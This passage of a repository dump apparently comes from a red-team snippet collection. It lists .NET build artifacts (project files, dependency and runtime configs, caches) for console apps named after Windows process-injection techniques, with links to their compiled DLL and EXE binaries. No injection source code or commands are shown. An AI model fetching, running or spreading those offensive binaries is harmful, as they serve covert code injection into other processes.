3 | "dgSpecHash": "yDtPFkmmK0x6Bj1ejJZrdurmesNI0rv96zUDh+/MJumZu2Dpwe/87a+H9GWhqp47DKyxck1DYE+fN/Hh/cSLjg==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\PInvoke\\PInvoke\\PInvoke.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/PInvoke/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "ConsoleApp1/1.0.0": {
10 | "runtime": {
11 | "ConsoleApp1.dll": {}
12 | }
13 | }
14 | }
15 | },
16 | "libraries": {
17 | "ConsoleApp1/1.0.0": {
18 | "type": "project",
19 | "serviceable": false,
20 | "sha512": ""
21 | }
22 | }
23 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = ConsoleApp1
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_CreateRemoteThread\ConsoleApp1\ConsoleApp1\
4 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | 3914a16dc66868dc2364d6ffe4a1fc74b6920dcb
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateRemoteThread/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "69n3ZJsUquHc4sOxi/CNchuohQhlJ+YJdDUezVnncW81sNReBiw65j6wg0uOTtyKpJLp0yACMx37kyAUhkLhiw==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_CreateRemoteThread\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "ConsoleApp1/1.0.0": {
10 | "runtime": {
11 | "ConsoleApp1.dll": {}
12 | }
13 | }
14 | }
15 | },
16 | "libraries": {
17 | "ConsoleApp1/1.0.0": {
18 | "type": "project",
19 | "serviceable": false,
20 | "sha512": ""
21 | }
22 | }
23 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = ConsoleApp1
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_CreateThread\ConsoleApp1\ConsoleApp1\
4 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | e744f908d881bf42cab133eb47ad3549e1832016
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_CreateThread/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "T5DCfvOqD/FmHEOz/I1KvKlgHbnKKs7Ont7s1fKDrylAu8i7pL5K61si8oGNungJMlNsJZEq9ejv5J+oBIPQDA==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_CreateThread\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "ConsoleApp1/1.0.0": {
10 | "runtime": {
11 | "ConsoleApp1.dll": {}
12 | }
13 | }
14 | }
15 | },
16 | "libraries": {
17 | "ConsoleApp1/1.0.0": {
18 | "type": "project",
19 | "serviceable": false,
20 | "sha512": ""
21 | }
22 | }
23 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = ConsoleApp1
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_NtMapViewOfSection\ConsoleApp1\ConsoleApp1\
4 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | dbc5f2d2dde9ded4efa7a46af73bce5b7462ad86
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/apphost.exe
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_NtMapViewOfSection/ConsoleApp1/ConsoleApp1/obj/project.nuget.cache:
--------------------------------------------------------------------------------
1 | {
2 | "version": 2,
3 | "dgSpecHash": "totIWlSrHR+s/eXPcnyaBqwVDT6uhdqNbTAl6ILr+g9i1VvqoIiI4ARBQFdwMuVgV3J/+vWZjp4rro2G2E4mfQ==",
4 | "success": true,
5 | "projectFilePath": "C:\\Users\\0xtriboulet\\Documents\\cs-progs\\ProcessInjection_NtMapViewOfSection\\ConsoleApp1\\ConsoleApp1\\ConsoleApp1.csproj",
6 | "expectedPackageFiles": [],
7 | "logs": []
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/ConsoleApp1.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "ConsoleApp1/1.0.0": {
10 | "runtime": {
11 | "ConsoleApp1.dll": {}
12 | }
13 | }
14 | }
15 | },
16 | "libraries": {
17 | "ConsoleApp1/1.0.0": {
18 | "type": "project",
19 | "serviceable": false,
20 | "sha512": ""
21 | }
22 | }
23 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.exe
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.pdb
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.dev.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "additionalProbingPaths": [
4 | "C:\\Users\\0xtriboulet\\.dotnet\\store\\|arch|\\|tfm|",
5 | "C:\\Users\\0xtriboulet\\.nuget\\packages"
6 | ]
7 | }
8 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/bin/Debug/netcoreapp3.1/ConsoleApp1.runtimeconfig.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeOptions": {
3 | "tfm": "netcoreapp3.1",
4 | "framework": {
5 | "name": "Microsoft.NETCore.App",
6 | "version": "3.1.0"
7 | }
8 | }
9 | }
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/ConsoleApp1.csproj.nuget.g.targets:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath)
5 |
6 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.AssemblyInfoInputs.cache:
--------------------------------------------------------------------------------
1 | 0cbac02cf6b33ab9449e1ec02e8dbba2474e8080
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.GeneratedMSBuildEditorConfig.editorconfig:
--------------------------------------------------------------------------------
1 | is_global = true
2 | build_property.RootNamespace = ConsoleApp1
3 | build_property.ProjectDir = C:\Users\0xtriboulet\Documents\cs-progs\ProcessInjection_QueueUserAPC\ConsoleApp1\ConsoleApp1\
4 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.assets.cache
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 2daac1f55b0f9263d04ca399f0ab1f7cfe7a4d3e
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.dll
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.genruntimeconfig.cache:
--------------------------------------------------------------------------------
1 | a20789d862bd7d7720a906d34c758f8b54de7636
2 |
--------------------------------------------------------------------------------
/C#/ProcessInjection/ProcessInjection_QueueUserAPC/ConsoleApp1/ConsoleApp1/obj/Debug/netcoreapp3.1/ConsoleApp1.pdb:
--------------------------------------------------------------------------------
